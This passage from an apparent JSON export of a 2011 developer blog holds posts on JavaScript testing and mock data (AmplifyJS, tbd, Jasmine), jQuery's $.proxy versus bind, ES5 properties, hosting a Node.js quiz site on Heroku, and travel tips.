And there you have it, you’re not ready to send emails from NodeJS on Heroku.\n", "id": "2012-01-05-heroku-sendgrid-nodejs" }, { "title": "Stubbing AJAX responses with tbd and AmpliyJS", "url": "https://www.aaron-powell.com/posts/2011-12-29-stubbing-ajax-responses-with-tbd/", "date": "Thu, 29 Dec 2011 00:00:00 +0000", "tags": [ "javascript", "amplifyjs" ], "description": "Working with tbd to build your requests without backend services", "content": "A project which I’m working on at the moment I’m using AmplifyJS to simplify my front-end routing through to my underlying data service calls. The problem is that I haven’t got the backend services ready yet (there’s some outstanding blockers in the API I’m working against) so I’m focusing my work on the front end.\nBut there’s the obvious problem, I want to push data to the UI but I don’t have any way to get the data.\nLuckily I wrote tbd recently which can solve one of the problems, it can generate data to pump into my new UI and this is where AmplifyJS really comes to shine.\nIntroduction to faking data with amplify.requestTo simplify my front-end routing I’m going to be using the Request API from AmplifyJS and if you’re not familiar with it check out the docs before going further as I only plan to cover the testing side of it.\nLet’s say I have a route defined like so:\namplify.request.define('get-data', 'ajax', { url: '/data-service', dataType: 'json', type: 'GET' }); And later in my app I’m accessing it:\namplify.request('get-data', function (data) { //using templating pump out the UI from the data }); So where does the faking data come in? Well the cool thing about how Amplify is designed means that you can replace a defined request!\nSay what?!\nFirst thing we need to understand is the request types. When you define your request in AmplifyJS the 2nd argument you pass in is the request type, generally speaking this will be ajax as that is the provided request type in the API. You can define your own types so if you were wanting to pull in from an OData service you can setup that, add a new key to the request types and then it’s all sweet (sorry how to do that is beyond this articles scope).\nWhere it gets really interesting is that if your provide only two arguments to the define method, a key and a function this works as well. In this case your function is executed when you invoke the request. Now let’s add this code:\namplify.request.define('my-data', function (settings) { settings.success({ status: 'success', items: { } }); }); This will make it so that whenever I call my request I will get a successful response with no data. There are properties which you need to set, first is the status to success so that AmplifyJS knows the response was successful, second is the items property which will contain any data you want returned to the method.\nSetting up your project Now you’ve got the basics down I thought I’d just give a bit of an insight into how I go about including this into a project. As mentioned you can override a defined request as many times as you want:\namplify.request.define('my-data', 'ajax', { ... }); amplify.request.define('my-data', 'odata', { ... }); amplify.request.define('my-data', function (settings) { ... }); Here I’ve setup the request three times but the last one to be executed is the one included.\nThe way I setup my project is that I have a file which I define my requests in, all of them together (or at least logically broken down into groups of common requests). For when I’m wanting to stub out my requests I create a secondary file and include the stubbed out requests in there and then include it directly after the main file. This means that once the real request is created it’s immediately replaced with fake out.\nWith the fake requests in a separate file I can include or exclude them as I please, as my services come online or even use them in unit tests.\nBuilding your dataThe idea of doing this all with AmplifyJS was shown to me by Elijah Manor. He sent me this jsfiddle which shows it all setup.\nThe problem with examples like this is that they are using fixed data, every reload of that page will show you exactly the same thing and clicking the refresh button on the UI will reload the data with exactly the same data. Now in this demo it’s not really that bit a deal, the data doesn’t really need to look different each time it’s not going to make much difference. But what if you are doing something that will look different based on the data, say you’re doing some charting?\nI’ve created a jsfiddle to demonstrate this, when you click the button the chart will be rebuilt with different data.\nNow here’s my mock request:\namplify.request.define('get-data', function (settings) { var data = tbd.from({}) .prop('category').use(tbd.utils.random('a', 'b', 'c', 'd', 'e')).done() .prop('value').use(tbd.utils.range(10, 100)).done() .make(tbd.utils.range(3, 8)()); settings.success({ status: 'success', items: data }); }); With tbd I’m scaffolding out a data series for my charting API, using the alphabet as the label and then a randomly chosen number between 10 and 100 for the value. This means that as I generate new data my UI will change (I’m leveraging one of tbd’s util methods to generate a random number of results as well (I might clean up the API to make that simpler in the future).\nConclusionAnd there we have it an example of how we can combine a couple of helpful JavaScript libraries to make it easier to:\nSimplify out UI request layer\nMake sure our development isn’t halted while data services are under development\nHave less hard coded data responses\n", "id": "2011-12-29-stubbing-ajax-responses-with-tbd" }, { "title": "Some useful Jasmine extensions", "url": "https://www.aaron-powell.com/posts/2011-12-23-useful-jasmine-extensions/", "date": "Fri, 23 Dec 2011 00:00:00 +0000", "tags": [ "javascript", "jasmine", "testing" ], "description": "A few useful match helpers for Jasmine", "content": "For tbd, a JavaScript helper I’ve written I’ve been using Jasmine for my testing.\nSome of the tests I’ve had to go beyond what matchers are available out of the box so I thought I’d share them here (mostly so I’ve got an easy point for myself to find them again :P).\nA quick into to adding your own matcherI’ve you’re new to Jasmine and haven’t added your own matchers here’s a quick tutorial.\nYou need to use the beforeEach and call addMatchers, like so:\nbeforeEach(function() { this.addMatchers({ alwaysTrue: function(){ //put your logic in here to determine truthy results return true; } }); }); Now you can call it like so:\nexpect('something').alwaysTrue(); This test extension that I’ve created isn’t really useful as it will always return true but you can put in any logic you want.\nThe this object has an actual property, which is the value from your expect method and the arguments passed to the call are passed in.\nMy matchersbeforeEach(function() { this.addMatchers({ toBeInArray: function() { return ~[].slice.call(arguments).indexOf(this.actual); }, toBeInDateRange: function(min, max) { var actual = this.actual.getTime(); return actual <= max.getTime() && actual >= min.getTime(); }, toBeInNumericalRange: function (min, max) { var actual = this.actual; return actual <= max && actual >= min; } }); }); Here’s how you use them:\nexpect('a').toByInArray('a', 'b', 'c'); expect(3).toBeInNumericalRange(0, 10); expect(new Date(2011, 11, 01)).toBeInDateRange(new Date(2011, 10, 01), new Date(2011, 11, 30)); Hopefully this is helpful to someone else :)\n", "id": "2011-12-23-useful-jasmine-extensions" }, { "title": "2011, a year in review", "url": "https://www.aaron-powell.com/posts/2011-12-22-2011-a-year-in-review/", "date": "Thu, 22 Dec 2011 00:00:00 +0000", "tags": [ "year-review" ], "description": "", "content": "As the year wraps up it brings time for the atypical year in review post!\nWhile last year I declared to be the year of the conferences but of course this year was just as crazy with conferences.\nI…\nGot a Microsoft MVP award! Went to the USA for my first time to go to MIX11 and talked FunnelWeb at the Open Source Fest Vegas is insane and I don’t think I’ve ever been as hung over in my life as I’d been Hanging out with Glenn Block was heaps of fun, he’s such a top guy I got to have lunch with Scott Hanselman, Phil Haack and Rob Conery which was pretty awesome from a nerd point of view The pre-party also allowed me to meet some of my idols in Douglas Crockford, Dave Ward and Elijah Manor Next stop was Melbourne and DDD Melbourne where I got to present on JavaScript craziness And watching Steve Godbold rap was just hilarious Next up was REMIX where I spoke on being a web developer and had to do an impromptu session where I talked about JavaScript again (although admittedly I lost the audience on the second talk :P) It wasn’t long until I was back on a plane to get to Denmark for CodeGarden 11 where I talked about everything from ASP.NET MVC to what is interesting in Umbraco 5 I have since been removed from the Umbraco project but I stand by what got me removed, instead I am trying to get people involved from the outside Back in Australia and it was time for DDD Sydney and a revisit my DDD Melbourne talk about getting freaky with JavaScript and talk about Open Source in the panel session run by Nick Hodge But no rest for wicked it was time for Teched NZ (slides) and then Teched AU (slides & video) I got voted one of the top sessions in the web track which was pretty exciting! Phew!\nFor the first time in 2 years though I didn’t resign from my job, I know, shockingly I’m still working at the same company I was working for this time last year.\nGenerally speaking I’ve scaled back my Open Source work, I’ve still tried to be active in the various communities but instead of actively developing I’ve tried to be more of a voice of reason. I’ve release a few small things such as:\nAnother pub/sub library in JavaScript A JavaScript quiz website Which I then rewrite in NodeJS But admittedly it’s not been getting a lot of love these days from myself or the community A library to building test data in JavaScript So here’s to a more JavaScript filled 2012!\n", "id": "2011-12-22-2011-a-year-in-review" }, { "title": "I want you", "url": "https://www.aaron-powell.com/posts/2011-12-19-i-want-you/", "date": "Mon, 19 Dec 2011 00:00:00 +0000", "tags": [ "umbraco" ], "description": "", "content": "\nHi, my name’s Aaron and I’m a former member of the Umbraco core team. Before I departed the core team something I was pushing for was greater involvement between the core (and HQ) and the Umbraco developer community.\nLet me make sure I clear one thing up first, Umbraco has a great user community, our.umbraco thrives with huge number of contributors helping everyone out from the beginner to the advanced. The extensions community is also a hive (sic) of activity.\nThe community that I’m talking about is the one around developing Umbraco as a product.\nIf you’re reading this you most likely have some vested interest in Umbraco, you’re doing freelancing and implementing it, your company sells solutions based around it or you are like me and just find CMSs sexy (well let’s hope that’s not the case :P). Whatever the case may be the direction of the product does have an impact on you so you should make sure your voice is heard. Even if you’re not a developer your voice is important, feedback about things you/ your clients find challenging, features you’d like to see, testing alpha/ beta/ RC released or even just questioning why something was done a particular way.\nHow do I get involved? This all sounds well and good but what should you do?\nA few months ago the Umbraco 5 contrib was opened up and it’s already starting to get some stuff around this up there.\nThere’s a post on contributing and then there’s the discussion around automated UI testing which Matt Braildsford took into a larger discussion last week.\nLastly there’s a room on JabbR but it’s a little quiet still these days.\nKeep an eye on the Umbraco twitter stream and grab nightly Umbraco builds.\nRaise a discussion if you don’t understand why something was implemented some way (but keep implementation discussions to our.umbraco).\nMonitor change set commits and make sure they are still conforming to what standards there are.\nSo c’mon, get involved!", "id": "2011-12-19-i-want-you" }, { "title": "Building data with tbd", "url": "https://www.aaron-powell.com/posts/2011-12-12-building-data-with-tbd/", "date": "Mon, 12 Dec 2011 00:00:00 +0000", "tags": [ "javascript", "nodejs" ], "description": "An introduction to tbd, a data generator for JavaScript", "content": "When building a UI that is driven by JavaScript one of the most tedious tasks is ensuring that you have data which you can populate into the UI to develop against. If you’re like me you probably prefer to do the UI component before the server component. Alternatively you could be working in a team where someone else is responsible for developing the server component at the same time as you’re developing the UI. Which ever the case is you’ll find yourself in a situation where you don’t have the data to build out your UI.\nThis is a situation that I find myself in quite often and it always left me thinking about how I would throw together some data to do the UI. Generally speaking it’d involve a bunch of copy and pasted lines of JavaScript which builds up an object graph. This does work but it’s not a great way to simulate data, especially if you want to change the data volumes and see how the UI will react.\nComing from a .NET background I’ve used libraries like NBuilder and Fabricator in the past. These libraries take an input object and will generate a series of fake data from it.\nSo I thought “hey, why not create that in JavaScript” and from there tbd was born!\ntbd - Test Data Buildertbd, or Test Data Builder is a project I started to create (fake) data using JavaScript. There’s a bit of a joke in the name, when I was trying to pick a name I was thinking “what’d be quirky, it’s for building test data, oh sweet, tbd since it can be Test Data Builder or To Be Defined, which makes for a good play on words”. Now the astute reader will notice the mistake immediately but for those with reading problems like me you’ll need a hint, Test Data Builder is actually tdb.\nThe idea behind tbd was to be able to take a JavaScript object and create a bunch more of them, as many as you want! I also wanted it to be disconnected to the browser so you could run it in both Node.js and the browser. For running it in the browser you need to add a reference to the file and with Node.js it’s up on npm.\nHere’s a basic example of how to use it:\nvar data = tbd.from({ hello: 'world' }).make(10); This will create an array of 10 objects all which are identical. Since JavaScript doesn’t have reflection like .NET there isn’t a way to get an inferred type of a property, instead you have to assign it a ‘default’ value. This can have an advantage though as it means you can also only have tbd generate values for properties you actually want random data for. So how do you do values?\nvar data = tbd.from({ foo: 1 }) .prop('foo').use(function() { return Math.random(); }).done() .make(10); This will create an array of 10 items which have a unique random number (well as unique as a random number can be :P) for the property foo. To break down the way it works you need to understand the fluent API for properties.\nPass the property name to the prop method as a string Pro tip - if the property name doesn’t exist on the source object it’ll still be added! Pass a value or function into the use method If you pass a value that will be used for each object If you pass a function it’ll be invoked for each object There’s some helper methods we’ll look at later Call done to signify you’ve finished with that property so you’re back to the root API and allow you to modify more properties The last thing you always call is make and specify the number of objects you want.\nAnd that’s it, you can go off and create all the data you could ever want.\nMaking better fake dataSince tbd is a really dumb API if you don’t tell it what to do with a property it wont do anything. So how do you produce better fake data? That might sound like a silly question but say you’re trying to build some graphs, you don’t want all the data to be the same do you?\nWell to simplify this tbd ships with a number of useful utilities for generating better fake data. The full list you can get off the readme but are some of the most useful IMO. All of these reside in the tbd.utils namespace.\nPick a random value Say you want to randomly choose a value from a set of values, say a bunch of different word, there’s a handy method that’ll do that called random and you use it like so:\nvar data = tbd.from({ hello: 'world' }) .prop('hello').use(tbd.utils.random('me', 'no me', 'why not me!')).done() .make(10); This method takes n number of arguments and it will randomly choose one of them for each object. You can pass in any data type that you want to this and it’ll take a random from the list so you’re not just restricted to strings.\nBetter random numbers and dates While the random method is great if you have a small set of data to go through but what if you don’t? What if you want a random number between 1 and 1000? Typing that out would suck. Well luckily there is the range method:\nvar data = tbd.from({ hello: 'world' }) .prop('hello').use(tbd.utils.range(1, 1000)).done() .make(10); For range you pass in a min and max value and something from in there will be used. This method also supports dates so you can randomly choose a date from within a range.\nSequences Sometimes you just want an ordered list of values and that’s where sequential comes in. Sequential you provide a start point and you’ll get a value incremented by one each time from there:\nvar data = tbd.from({ hello: 'world' }) .prop('hello').use(tbd.utils.sequential(1)).done() .make(10); Note: I had a mistake in the initial post, the method is sequential not sequence.\nDate sequences One cool thing about the sequential api is that you can provide it a date and it will increment that. By default the dates will shift one day at a time to get you to your new date:\ntbd.from({ date: new Date }) .prop('foo').use(tbd.utils.sequential(new Date() /* optional parameter for date property the increment, default is 'd' */) .make(10); //the 'day' property will be incremented by 1 from the starting value But you can overload this to increment by other date parts:\ny -> Year M -> Month d -> Day (default) h -> Hour m -> Minutes s -> Seconds ConclusionSo this wraps up our look at tbd, a useful little tool I wrote to make it easier to build out some fake data for when you’re mocking a UI or to pump into a test.\nGrab it today!\n", "id": "2011-12-12-building-data-with-tbd" }, { "title": "You don't need to use $.proxy", "url": "https://www.aaron-powell.com/posts/2011-12-12-you-dont-need-jquery-proxy/", "date": "Mon, 12 Dec 2011 00:00:00 +0000", "tags": [ "jquery", "javascript" ], "description": "Why you shouldn't use (and don't need to use) the $.proxy method in jQuery", "content": "I’ve been recently going through some extending of a jQuery UI widget which a colleague had written when I came across quite a number of statements that were using the proxy method from jQuery.\nFor anyone who’s not familiar with the proxy method is allows you to take a function and specify a context (the this value) so when you pass it around for execution you always know what you’re going to have as the context.\nThe method has been around for a while and it did serve a good purpose but these days its usefulness is becoming limited and I’m going to look at a few reasons as to why you shouldn’t be using it.\nUnderstand thisThe most common reason I see that people will use proxy is because they don’t understand how this works in JavaScript. While there are dozens of articles through your favourite search engine explaining this (here’s a good start) I’ll do my best to give a quick overview.\nWhen people come from C# they already have a notion of this and what it represents, unfortunately this is a broken assumption when moving to JavaScript. In C# this represents the current class which you’re working within but since JavaScript isn’t a classical language there isn’t the concept of a class so you couldn’t really associate it to one could you?\nInstead this represents the context for which a function is executed for and different kinds of execution result in different contexts. Here’s a few examples:\nInvoking a function from an object will set the context to the owner object Invoking a function literal will set the context to the global object (window in a browser) Invoking a function with apply/ call allows it to be controlled And this is why a lot of people get utterly confused with this in JavaScript.\nBut what does this have to do with the $.proxy method? As I said one of the most common reasons I see people using it is because they want to be able to access members of a particular object within a callback (such as a function called from an AJAX success). Because they are aware that in their outer function they can go this.foo they expect it to be available within the callback (after all isn’t the callback in the same class?) but it will fail so they use $.proxy to ensure that they can access the member(s) they require.\nSo why is it a poor choice in this scenario? Well the reason is that you can solve the problem in a much simpler fashion, by understanding JavaScript closures. You can draw a lot of similarities between JavaScript closures and C# closures, but the simplest explanation is that a variable with be within scope until all functions that require is have been descoped. But with the case of this, since it changes between function scopes the var that = this pattern emerged in JavaScript.\nLet’s have a look at some code:\nvar foo = { makeRequest: function () { $.get('/foo', $.proxy(function (result) { this.update(result); }, this) ); }, update: function (data) { /* ... */ } }; //somewhere later in the code foo.makeRequest(); Here we’re using the proxy method to make it possible to access the update method, since when we called the makeRequest method its this is a reference to foo (we’re assuming that the assignment of foo is out of scope for the makeRequest method). So let’s update it to use variable closures:\nvar foo = { makeRequest: function () { var that = this; $.get('/foo',function (result) { that.update(result); }); }, update: function (data) { /* ... */ } }; foo.makeRequest(); The difference here is that I’m assigning the value of this to a variable before the callback is created and inside the callback I refer back to the variable.\nSo why is this better than using proxy? The primary reason is readability, if you look at the first snippet you’re intention is obscured by the use of proxy to change the scope. When someone who understands JavaScript comes to that snippet they have to know what the use of proxy is and why the this context needs to be controlled. With the second snippet it’s clearer to see that you want to call the update method on the same object which makeRequest was invoked from.\nUse built-in methodsAn often missed note of JavaScript (well ECMAScript really) is that the functionality that is provided by proxy (and the similar methods in the other libraries) is built into the language, through the bind method. The bind method was added as part of ECMAScript 5 and\nCreates a new function that, when called, itself calls this function in the context of the provided this value, with a given sequence of arguments preceding any provided when the new function was called.\nHmm that sounds pretty much like what you get from the proxy method yet it’s built into the language.\nThis means that you can (potentially) get a performance boost (check it out on JSPerf) by using a native browser API rather than the wrapper. Also at the time of writing jQuery (1.7.1) doesn’t use the native browser method it does the code itself.\nPerformance aside the main difference between the jQuery implementation and the ECMASCript 5 specification is the jQuery proxy method does not throw a type error if the first argument is not a function which the spec states bind will do. So although they are named differently they are providing the same functionality except for a critical check.\nThe take away from this point is that it’s built into the language so using it makes a lot of sense and when you’re in browsers that don’t support it it’s easy to polyfil the missing API (the mdn docs include the polyfil).\nConclusionThat wraps up my “rant” against using the proxy method in jQuery. The goal of this article was to teach you a bit more about the JavaScript language and that things people commonly try and work around have simpler solutions.\nBy understanding language concepts such as this and closures you can avoid manipulating scope.\nBy knowing what’s new in the language you can use built-in APIs and make faster and more portable code.\n", "id": "2011-12-12-you-dont-need-jquery-proxy" }, { "title": "Xamlizer - How to implement something silly in JavaScript", "url": "https://www.aaron-powell.com/posts/2011-10-24-xamlizer-implementing-something-silly-in-javascript/", "date": "Mon, 24 Oct 2011 00:00:00 +0000", "tags": [ "javascript", "doing-it-wrong" ], "description": "", "content": "I’ve never done much Xaml development, I started reading a WPF book and played around with it only to realise I didn’t have any understanding of this concept of a stateful application or how layouts were going to work. And as a web developer who never saw the appeal of Flash I also never got into Silverlight as there was never a problem in my life that it would solve.\nThe one thing I do remember from my brief foray into that scary other world is the reliance on INotifyPropertyChanged and INotifyPropertyChanging interfaces. I’ve always thought that the idea behind these two interfaces was a good one, the primary problem though is how you actually have to implement them. Seriously, there’s a lot of shit code you have to implement.\nSo I decided to do something a bit silly, I decided to implement the two interfaces in JavaScript.\nA dumb idea with a point Now I see no real reason to use the code that I’m going to look at in any current development (I’ll explain why later) but more importantly I want to look at something that is part of ECMAScript 5 that doesn’t get the attention it deserves, Object.defineProperty.\nJavaScript properties throughout historyJavaScript, unlike languages such as C#, doesn’t really have this concept of a property like you get there, the idea of a get and set operating being something that you can control. Really this is how a class in JavaScript with some public properties looks:\nvar person = { firstName: 'Aaron', lastName: 'Powell' }; And when we want to update a property we’d do something like this:\nperson.firstName = 'John'; Now there’s nothing wrong with this, it does what you’ll want to do in a lot of scenarios, the problem is when you’re wanting a slightly more complex scenario, say you want to react to a change to the firstName property, maybe perform some validation.\nLet’s assume we want to have an age property on our person. Obviously we want to make sure that age is at least 0 and probably less than 110 (sounds reasonable :P), well how do you do this?\nValidation before assigning the property? That’ll work, but what if we’re exposing it to external API’s? How can we enforce the validation to them? Functions as properties The general way which this problem is solved is to rather than use assignable properties you use functions as properties, making your code look like this:\nvar person = (function() { var _age; return { //firstName, lastName, etc age: function(val) { if(val !== undefined && (val >= 0 && val <= 100) { _age = val; } else { //Raise an error } return _age; } } })(); Now we use the age property like so:\nperson.age(27); console.log(person.age()); //outputs 27 Now this isn’t really that bad, the main pain point to it is that we now have a different way to assign the value, we do it through a function invocation rather than through an assignment statement. This can come to light if you’re writing a JavaScript templating engine, you need to check if the property is actually a property or a function property. But we do get some nice stuff like the fact that in JavaScript you don’t need to do overloads so we can have the one function perform both the get and set operation for our property.\nLibraries such as KnockoutJS use this pattern for properties to do their UI binding but it can cause confusion, like in KnockoutJS if you want to bind to a property you’d do something like this: data-bind="css: { someClass: someBoolean }" which Knockout will understand it’s an observable property and bind to the result of the function, but if you want to use the false value you need to do data-bind="css: { someClass: !someBoolean() }". Note that this time it’s invoked the property as a function rather than just using the property.\nThe can be a bit confusing and I’ve seen more than one developer (including myself) getting stumped as to why their bindings weren’t working only to realise that it’d because they are binding to !someBoolean which equates to !function() { } rather than the result of the function. It’s a very face-palm moment.\nIntroducing ES5 propertiesAs part of the ECMAScript 5 spec the concept of properties was addresses and has resulted in the Object.defineProperty API (and an API to define multiple at once, being Object.defineProperties) and this allows us to (among other things) define get and set method bodies for our properties.\nLet’s revisit our person.age property example from above, but do it using an ECMAScript 5 property:\nvar person = (function() { var _age; var newPerson = { firstName: 'Aaron', lastName: 'Powell' }; Object.defineProperty(newPerson, 'age', { get: function() { return _age; }, set: function(value) { if(value && value >= 0 && value <= 110) { _age = value } else { //raise error } } }); return newPerson; })(); person.age = 27; console.log(person.age); Hopefully you can see here the difference between the function property and the ES5 property.\nWith ES5 the property with a function body looks just like a public field. Now there’s a few other things you can do here, such as make properties read-only and exclude them from for...in loops, and for that check out the MDN (you can also do body-less properties), but it makes it very easy to build smarts into your objects. Also like .NET if you want to provide a get/set you need to have a backing store, but that’s easy to get around with closure scope.\nSo that covers a basic look ES5 properties. Now back to our bad idea…\nImplementing INotifyPropertyChange in JavaScriptAs I demonstrated above it is possible to add a body to your properties let’s do something with that idea.\nIf you’re not familiar with INotifyPropertyChang* then you should read the MSDN docs. The TL;DR is that you use trigger the Changing event before you assign the property and then the Changed event after it’s assigned and the UI can react.\nAs I said I think there’s a lot of value in this pattern, it’s just that as most Xaml devs will tell you implementing it is a real pain in the ass.\nSo say you wanted to implement it in JavaScript, it’s not overly hard, ultimately we need to do something like this:\nObject.defineProperty(foo, 'prop', { get: function() { return _prop; }, set: function(val) { propertyChanging(this, 'prop'); _prop = val; propertyChanged(this, 'prop');\t} }); I’ve ignored the guff code like what the propertyChang* methods are doing as well as subscribing handlers to the events but you get the idea. This really don’t look any different to the C# version though does it? So what’s the point?\nMaking it better through the magic of JavaScript As you can see there’s a lot of boilerplate code that you need to get this working. In .NET there’s no real way to avoid this (unless you do some magic under the covers). But one of the cool things about JavaScript being a dynamic language is that we can modify an object pretty damn easily. Let’s go back to our person object:\nvar person = { firstName: 'Aaron', lastName: 'Powell', age: 27 }; Now imagine that I want to implement my JavaScript version of INotifyPropertyChang* on it so that my UI can react whenever I update the values, but I don’t want to be going through and writing this all out myself, I’ve got a bunch of objects that I want to promote to implementing the interfaces.\nWell since JavaScript doesn’t actually have interfaces in the language it’s a bit tricky, and this is where my funky little script comes in.\nHello Xamlizer!\nSo I’ve created a little JavaScript code snippet which I’ve called Xamlizer that’ll take an object and implement INotifyPropertyChang* on it. Now the script isn’t really that smart, all it does is goes through all the properties of the object and then converts them into properties that implement our pattern.\nYou can then use it like this:\nvar person = { firstName: 'Aaron', lastName: 'Powell', age: 27 }; xamlizer(person); person.addPropertyChanging(function(object, property) { console.log('Property ' + property + 'changing'); }); person.age = 28; And there we go, we’ve got a script that’ll turn our normal JavaScript objects into something that can notify subscribers when the property changes.\nIf you dig into the code for Xamlizer you’ll see that it doesn’t do anything really complex, it just modifies some properties. Note: As I said it’s not really that smart, it actually modifies anything public on the object, so if you have a function that is public it might get crazy :P. But hey, it’s just demo code!\nAnd if you want to see it in action check out the jsfiddle.\nConclusionWell this wraps up our look at the limitations in how you have to do properties in ES3, the changes which ES5 provides you with (although their usefulness at the moment is debatable since we have to support ES3 browsers for a while still) and finished off with looking at how to implement a generic library to change fields to properties with debatable usefulness.\n", "id": "2011-10-24-xamlizer-implementing-something-silly-in-javascript" }, { "title": "Rebuilding JavaScript Quiz in Nodejs", "url": "https://www.aaron-powell.com/posts/2011-10-12-rebuilding-javascript-quiz-in-nodejs/", "date": "Wed, 12 Oct 2011 00:00:00 +0000", "tags": [ "nodejs", "javascript" ], "description": "", "content": "A few months back I announced a new site I was running called JavaScript Quiz. When I started to site it was to be done quickly so I chose an out-of-the-box blogging platform, that being Posterous.\nSince then I’ve come to realise that it isn’t the platform I want wanting to go with. One of my main problems with it is its comment management system. Anyone who has submitted an answer to me will know what I’m talking about, the excessive spam which you end up with when I do publish all the answers.\nWell because of this I decided to move away from Posterous and go with a new platform. As my new platform I decided that I wanted to use Node.js because well this is a JavaScript quiz so why not use JavaScript!\nThe softwareWhen looking at what I wanted to do with the new site I decided I wanted something that was easy to create a site in and also easy to update content it. A lot of people are raving about Jekyll of recent, which is a Ruby CMS which runs a flat file system website and Markdown as an editing language.\nThis seemed ideal, JavaScript Quiz isn’t a big site nor is it a dynamic site so something that runs off flat files is very ideal. I’m also quite a fan of Markdown (which we use in FunnelWeb) so being able to write my posts in that is very nice an idea.\nSo I started looking for a Node.js alternative as I’d prefer to use something than write it myself (I’m a bit over developing a CMS at the moment) and I came across a project called Docpad.\nIntro to Docpad Docpad is a Node.js CMS in a similar style to Jekyll written by a guy from Sydney named Benjamin Lupton (and I like supporting home-grown software so that was a big plus). It’s got a good set of templating engines to pick from so you don’t have to use raw HTML if you want something a bit more cool for your templates (more shortly) and best of all it’s shit simple to use.\nYou need to install the following npm packages and you’re off and running:\ncoffee-script express docpad You’re better off installing both coffee-script and docpad globally since they both have executables but you don’t have to.\nNote: I had problems using Node.js with cygwin on Windows, I couldn’t get docpad to install but that seemed to be a cygwin issue as it worked fine on both my Linux and OSX machines, just something to watch out for :).\nThis isn’t a Docpad tutorial, go check out the docs if you want to learn more.\nTemplates As I mentioned Docpad has a number of different HTML templating engines available, you can use Eco, Jade, Haml or the one I chose, CoffeeKup!\nCoffeeKup is a way of using CoffeeScript as a HTML template engine. It’s pretty cool and it means that you’re able to do some really powerful things with the templates and interacting with the document you’re rendering. Plus it means that we’re using JavaScript/ CofeeScript for most of our site (one language to rule them all!).\nCSS I’m not using any of the CSS templating engines (despite submitting a request for CCSS to be included :P) mainly because I’m using HTML5 Boiler Plate’s css and I don’t want to have to convert it every time I upgrade.\nThe rest of the CSS is really basic and I’ve just cobbled together so I can get the site live, expect it to be improved as I get more time.\nFixing commentingAs I mentioned commenting is something that was really a pain to anyone who was entering the quiz each week as you’d get spammed up with emails (don’t worry, I got them all as well so it was very annoying). Good news is that the new site wont have this problem, I’ve gone with Disqus for comments (still moderated) which means that it should be much nicer an experience.\nFrom an admin point of view it’s much nicer as well :).\nHostingOne advantage of Posterous was that it was a hosted solution so it wasn’t costing me any more and this is something that I wanted to ensure didn’t change. I decided that I’d go with Heroku for my hosting since they have offered Node.js hosting for a while now.\nThis means that I am also using Git to store the site and I have it hosted on GitHub at the moment (sorry it’s not a public repo :P).\nBecause of this I have a nice workflow of being able to edit my content, run it through the Docpad ‘compiler’ and commit in the generated HTML. This then goes up to Heroku and just runs off the flat files.\nIdeally I’d not be committing the generated files and have part of the app startup code generate the files but so far I’ve had nothing but trouble getting it working that way. Heroku’s cedar stack (which is where node.js runs) is a writable file system but something still seems to be going amiss (and it’s not exactly easy to dig into…).\nWrap upSo this is how I’ve gone about the relaunch of JavaScript Quiz. The new site should be active soon (awaiting the DNS to change over :P). I wont be porting the old comments so the old site will stay active. Hopefully I’ve got the redirects all sorted out (yes the 404 page is pretty shit so far :P). Hopefully this provides a nice new home for the site.\n", "id": "2011-10-12-rebuilding-javascript-quiz-in-nodejs" }, { "title": "Tips for travelling as a geek", "url": "https://www.aaron-powell.com/posts/2011-10-12-tips-for-travelling-as-a-geek/", "date": "Wed, 12 Oct 2011 00:00:00 +0000", "tags": [ "random" ], "description": "", "content": "Anyone who follows me on twitter will have probably noticed that in the last two weeks I’ve been tweeting with a geolocation in Vietnam. If you’re really smart you may have worked out that I was on holidays over there!\nI had a bit of tech with me, an iPad, iPhone, laptop and 2 kindles so I thought I’d share some of my experiences and tips for travelling as a geek.\nStay connectedSomething that I find is very useful when travelling is having access to the internet. It allows me to do those useful things such as email/ skype my parents, use google maps and check in on foursquare.\nSo my first pointer when going overseas is work out how you plan to stay connected. Most hotels I’ve stayed in recently have had free wifi so if that’s good enough for you then check out the places you plan to stay. Also a lot of cafe’s and bars (particularly ones targeting travellers) offer free wifi so that can allow you your mid-day twitter fix.\nThe other option is picking up a local sim. I’ve been to the USA, Denmark and Vietnam this year and all those countries have prepaid sims which you can pick up and drop into your device. For the USA check out things like GoPhone from AT&T. In Denmark I picked up a sim card from the post office (don’t remember who the provider was though) for 99 Danish Krone that lasted for 1 week and in Vietnam I got a sim for a month for the whole of $1USD!\nSo before you go check out the country and you’ll probably find an easy way to pick up a sim card. We found this really useful in Vietnam as it meant we could look up an address rather than relying on shitty maps in guide books, saving an argument or two with the girlfriend :P.\nBefore you go for a local sim card make sure your phone is network unlocked. I ended up in Denmark with a network locked phone and my sim wasn’t usable in it :(\nInternet beats booksLike a studious traveller we picked up our copy of the Lonely Planet but by the end of the trip we were only use it for one purpose, the find out where not to go.\nNow I don’t want to rag on Lonely Planet too much but it’s really hard for a print book to keep pace with the internet. Instead we turned to good ol’ technology (since I had a local sim) to find out stuff to do. Now I want to talk about two sites that are invaluable if you’re travelling.\nWikitravel Url: http://wikitravel.org\nWikitravel is the wikipedia of travel websites. It’s got lots of great tips on history of a place, what to see while you’re there how to get in, out and around. The kind of stuff you can get out of a Lonely Planet guide book but it is able to be kept up to date (say around pricing of cabs). It can even give you those handy tips that you wont find out until you’ve hit them (such as Melbourne trams having coin-only ticket machines).\nThat said be careful of vandalism/ shameless self promotion on the site, you’ll occasionally find companies promoting themselves on there. It’s generally pretty easy to pick them though.\nTrip Advisor Url: http://www.tripadvisor.com/\nTrip Advisor is a must when you’re planning your trip and when you’re away. The site is full of user generated content and allows for people to enter information about places they’ve visited, stayed, eaten at, etc and then vote against them.\nAgain this is something that kills Lonely Planet. Where Lonely Planet can only have a finite amount of places listed and gets out of date, a site based around generate content can reflect the actual mood of travellers to an area.\nWe used this to find recommendations for hotels, places to eat or just check out others opinions for places we got recommended by friends.\nHave adaptersIt goes without saying that when you’re travelling having local power adapters is a valuable thing but what I found more valuable was carrying a multi-port adapter. Don’t go crazy and take like a 10 port power board if you only have 2 devices but they can be handy (particularly if you’re travelling for work as well as play).\nTravel insuranceIt goes without saying that you should have travel insurance with you but make sure that your policy will cover you for the devices you are carrying with you. Last thing you want is to lose your laptop and find out that you only had $500 of coverage!\nI went with Travel Insurance Direct who have a reasonably well priced set of plans including yearly world-wide plans.\nTL;DR Get a local sim\nUse WikiTravel and Trip Advisor\nMake sure your travel insurance will cover your gear\n", "id": "2011-10-12-tips-for-travelling-as-a-geek" }, { "title": "Creating a ViewModel from the server", "url": "https://www.aaron-powell.com/posts/2011-09-18-creating-vms-from-server/", "date": "Sun, 18 Sep 2011 00:00:00 